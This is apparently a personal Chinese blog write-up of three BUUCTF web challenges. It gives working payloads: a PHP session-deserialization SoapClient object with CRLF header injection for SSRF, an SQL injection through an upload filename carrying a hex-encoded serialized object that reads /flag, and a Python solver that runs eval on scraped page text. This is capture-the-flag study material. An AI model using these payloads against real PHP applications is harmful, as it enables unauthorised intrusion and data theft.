BUU WEB PWN

bestphp’s revenge

知识点：php原生类构造pop链！session反序列化@ +crlf

首先我们要知道！php session 存储是序列化的！

当我们带着sessionid去访问服务器时！找到我们的session文件！它会自动化反序列化！

我是这样理解的！就是session反序列的过程是自动的！

这里session反序列化漏洞原因是因为 序列化和反序列化用的引擎不同！

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?> array(0) { }

有一点注意下：
题目和环境php版本还是比较低的！

call_user_func 传入数组是可以直接调用函数的！🙄 从7.1就不行了！

文章

session反序列化

https://xz.aliyun.com/t/6640#toc-8

反序列化之PHP原生类的利用

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

我还是对php语言不是很了解！

session_start(array `$options` = array()): bool

extract(array `&$array`, int `$flags` = **`EXTR_OVERWRITE`**, string `$prefix` = ""): int

这两个函数都是 加数组的！

php默认session引擎是

思路：
首先设置php_serialize 在服务器上写入咱的session文件！然后extract变量覆盖b 同时使用同一个sessionid访问服务器上同一个session文件！session反序列的同时！call_user_func调用 (‘SoapClient’,’welcome_to_the_lctf2018’)` 就是

call_user_func(call_user_func,array('SoapClient','welcome_to_the_lctf2018'))

就会触发SoapClient __call方法 运行咱的pyload！达到ssrf的效果！

payload

/?f=session_start&name=|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A32%3A%22upload%0D%0ACookie%3A+PHPSESSID%3Dupload%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D%20

serialize_handler=php_serialize


extract&name=SoapClient

b=call_user_func

好难的一道题苦苦 😫😫😫😫😫

[GXYCTF2019]StrongestMind

知识点：py脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2021/8/5 16:46
# @Author  : upload
# @File    : [GXYCTF2019]StrongestMind.py
# @Software: PyCharm


from lxml import etree
import requests
import re
import os
import time
poy = {
    'http': '127.0.0.1:8080'
}

burp0_url = "http://3f9707bc-e9ae-4e4d-9e59-a072e1e9854e.node4.buuoj.cn:81/index.php"
burp0_cookies = {"OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924", "UM_distinctid": "17b0b3c6b83d44-005a7fe99cb475-d7e163f-144000-17b0b3c6b84c1f", "PHPSESSID": "a4c18bab1eee3073d7cfdefcdcf8fc5c"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://3f9707bc-e9ae-4e4d-9e59-a072e1e9854e.node4.buuoj.cn:81", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://3f9707bc-e9ae-4e4d-9e59-a072e1e9854e.node4.buuoj.cn:81/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
burp0_data = {"answer": "adada"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

#先开启session 抓到当前页面
s = requests.Session()
r = s.get(burp0_url)
upload = '<br>.*<br><br>(.*) (.) (.*)<br><br>'
nums = re.findall(upload, r.text, re.S)
for num in nums:

    num1 = num[0]
    yuns = num[1]
    num2 = num[2]

    res = num1 + yuns + num2 # 笨蛋了 还在想加减乘除咋搞 直接eval解决了
    ans = eval(res)
    print(ans)

for i in range(1,2000):
    print(i)
    data = {
        "answer" :ans
    }
    r2 = s.post(burp0_url,data=data)
    upload = '<br>.*<br><br>(.*) (.) (.*)<br><br>'
    nums = re.findall(upload, r2.text, re.S)
    if 'flag{' in r2.text:
        print(r2.text)
        break
    for num in nums:
        num1 = num[0]
        yuns = num[1]
        num2 = num[2]
        res = num1 + yuns + num2  # 笨蛋了 还在想加减乘除咋搞 直接eval解决了
        ans = eval(res)

    if 'bingo!' in r2.text:
        print("成功")
    elif "算错了呀，重新来吧！" in r2.text:
        print("nono")

    if r2.status_code == 429:
        print("fast")
        time.sleep(1)


# print(num1,yuns,num2)

#39206667 + 12942587

[安洵杯 2019]不是文件上传

知识点：代码审计

https://www.z1r0s.top/2021/03/16/security/webvuln/unserialize/php-fan-xu-lie-hua/

可以看到：

protect 是 chr(0)*chr(0)

priv 是chr(0)类名chr(0) 好久没看都忘了！🙄

写入数据库前 它故意把chr(0)*chr(0)替换了！

通过这两个点来序列化和反序列！

看了师傅的思路可以直接insert注入！ 我一开始想的是pop链！都是发现不行！

想着通过attr但是太复杂了 它还要序列化！直接直接title!

0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d

payload:

INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) VALUES('111','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png','a:2:{s:5:"width";i:1;s:6:"height";i:1;}')

111','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png','a:2:{s:5:"width";i:1;s:6:"height";i:1;}')
33','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('111','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png','a:2:{s:5:"width";i:1;s:6:"height";i:1;}')

filename="33','00e93b3872bb9749.png','png','pice93b3872bb9749.png',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
),('111.jpg"

自己花点时间调试调试就懂了！哈哈哈🥱🥱🥱🥱🥱🥱

我笨笨！一开始看见还以为这个是反序列化字符逃逸呢！哈哈！